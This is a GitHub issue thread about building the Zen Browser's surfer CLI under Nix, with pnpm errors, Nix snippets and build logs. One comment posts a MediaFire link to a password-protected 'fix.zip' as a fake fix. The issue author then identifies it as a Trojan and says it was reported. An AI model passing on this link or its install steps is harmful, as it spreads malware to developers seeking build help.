### ISSUE TITLE
Calling for a pr to reference the surfer CLI.

### ISSUE THREAD

**Issue by Eveeifyeve** [Eveeifyeve/zen-browser#2]
I am calling for your help to reference the surfer cli as when I try to install using pnpm it runs into: `GET https://registry.npmjs.org/surfer error (UNABLE_TO_GET_ISSUER_CERT_LOCALLY). Will retry in * seconds/minutes.`

A package for this has been provided in [this issue comment](https://github.com/NixOS/nixpkgs/issues/327982#issuecomment-2316195079).
Which I have provided the file as surfer-cli which is improved, but I don't know how to integrate this as it's used for building and packaging zen browser (if needed).

# Useful resources:
- https://github.com/zen-browser/desktop/blob/main/package.json
- Build script: https://github.com/zen-browser/desktop/blob/main/.github/workflows/src/alpha-build.sh
- Build MacOS: https://github.com/zen-browser/desktop/blob/main/.github/workflows/macos-alpha-build.yml
- Build Linux: https://github.com/zen-browser/desktop/blob/main/.github/workflows/linux-alpha-build.yml

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Eveeifyeve** [comment]
> Download https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file password: changeme In the installer menu, select "gcc."

?

**Comment by Eveeifyeve** [comment]
> Download https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file password: changeme In the installer menu, select "gcc."

Do not download it's a Trojan I have reported this to github.

**Comment by youwen5** [comment]
Do you mean you aren't able to call `surfer` from inside `buildPhase`? I did something like this and I was able to call surfer, but it errors out because of some missing files which I'm looking into rn.

```
        # `nix build` to build the package
        packages.default = pkgs.callPackage ./default.nix {surfer-cli = pkgs.callPackage ./surfer-cli.nix {};};
```

```
{
  lib,
  stdenv,
  pnpm,
  nodejs,
  surfer-cli, <---- added this line
  fetchurl,
  fetchFromGitHub,
}: let
```

**Comment by Eveeifyeve** [comment]
Since pnpm is trying to install it I might have to do a patch at package.json and lock.

**Comment by youwen5** [comment]
Sorry if I'm not following correctly, but are you getting this error:
```
GET https://registry.npmjs.org/surfer error (UNABLE_TO_GET_ISSUER_CERT_LOCALLY). Will retry in * seconds/minutes.
```
when you try to build the package (`nix build .#packages.x86_64-linux.default`)?

I'm trying to reproduce the error but I get this output:

```
zen-browser> source root is source
zen-browser> Running phase: patchPhase
zen-browser> Running phase: updateAutotoolsGnuConfigScriptsPhase
zen-browser> Running phase: configurePhase
zen-browser> no configure script, doing nothing
zen-browser> Executing pnpmConfigHook
zen-browser> Configuring pnpm store
zen-browser> Installing dependencies
zen-browser> Lockfile is up to date, resolution step is skipped
zen-browser> Packages: +178
zen-browser> 
zen-browser> Progress: resolved 178, reused 178, downloaded 0, added 178, done
zen-browser> 
zen-browser> dependencies:
zen-browser> + @zen-browser/surfer 1.3.5
zen-browser> 
zen-browser> Done in 490ms
zen-browser> Patching scripts
```

I get straight to the build phase and it exits as expected. If I remove `exit 1` and let it run `pnpm build` it's missing some files so it fails.

**Comment by Eveeifyeve** [comment]
> Sorry if I'm not following correctly, but are you getting this error:
> 
> ```
> GET https://registry.npmjs.org/surfer error (UNABLE_TO_GET_ISSUER_CERT_LOCALLY). Will retry in * seconds/minutes.
> ```
> 
> when you try to build the package (`nix build .#packages.x86_64-linux.default`)?
> 
> I'm trying to reproduce the error but I get this output:
> 
> ```
> zen-browser> source root is source
> zen-browser> Running phase: patchPhase
> zen-browser> Running phase: updateAutotoolsGnuConfigScriptsPhase
> zen-browser> Running phase: configurePhase
> zen-browser> no configure script, doing nothing
> zen-browser> Executing pnpmConfigHook
> zen-browser> Configuring pnpm store
> zen-browser> Installing dependencies
> zen-browser> Lockfile is up to date, resolution step is skipped
> zen-browser> Packages: +178
> zen-browser> 
> zen-browser> Progress: resolved 178, reused 178, downloaded 0, added 178, done
> zen-browser> 
> zen-browser> dependencies:
> zen-browser> + @zen-browser/surfer 1.3.5
> zen-browser> 
> zen-browser> Done in 490ms
> zen-browser> Patching scripts
> ```
> 
> I get straight to the build phase and it exits as expected. If I remove `exit 1` and let it run `pnpm build` it's missing some files so it fails.

Yes I am getting this error.

**Comment by Eveeifyeve** [comment]
But also the missing files is also the problem.

**Comment by youwen5** [comment]
I am able to access `surfer` from within buildPhase but I don't think it's able to fetch any of the network resources it needs. With some hacky patches I got to this point:

```
zen-browser> 00:00:40 Switched to a new branch 'zen_browser'
zen-browser> 00:00:40 Adding addons to mozbuild...
zen-browser> 00:00:40 Discarding browser/extensions/moz.build...
zen-browser> 
zen-browser> 
zen-browser> SUCCESS You should be ready to make changes to Zen Browser.
zen-browser> 
zen-browser>    Remember to change the repository in configs/common/mozconfig to your own.
zen-browser>    You should import the patches next, run |surfer import|.
zen-browser>    To begin building Zen Browser, run |surfer build|.
zen-browser> 
zen-browser> 00:00:00 Bootstrapping Zen Browser...
zen-browser> Passing through to |mach bootstrap|
zen-browser> 
zen-browser>    ERROR An error occurred while running command ["bootstrap"]:
zen-browser> 
zen-browser>     Error: spawn ./mach ENOENT
zen-browser>     
zen-browser>     • onErrorNT (node:internal/child_process:484:16)
zen-browser>     • process.processTicksAndRejections (node:internal/process/task_queues:82:21)
zen-browser> 
zen-browser> 00:00:00 Exiting due to error.
zen-browser>  ELIFECYCLE  Command failed with exit code 1.
zen-browser> 
zen-browser> > zen-core@1.0.0 build /build/source
zen-browser> > surfer build
zen-browser> 
zen-browser>  WARNING You have not imported all of your patches. This may lead to unexpected behavior
```

**Comment by youwen5** [comment]
That error is probably because the `engine/` directory is empty since it's supposed to be fetched by surfer. We need to copy its contents in ourselves, but I'm not sure where to obtain it.

**Comment by Eveeifyeve** [comment]
It works, I just had some issues with npm ratelimiting me.
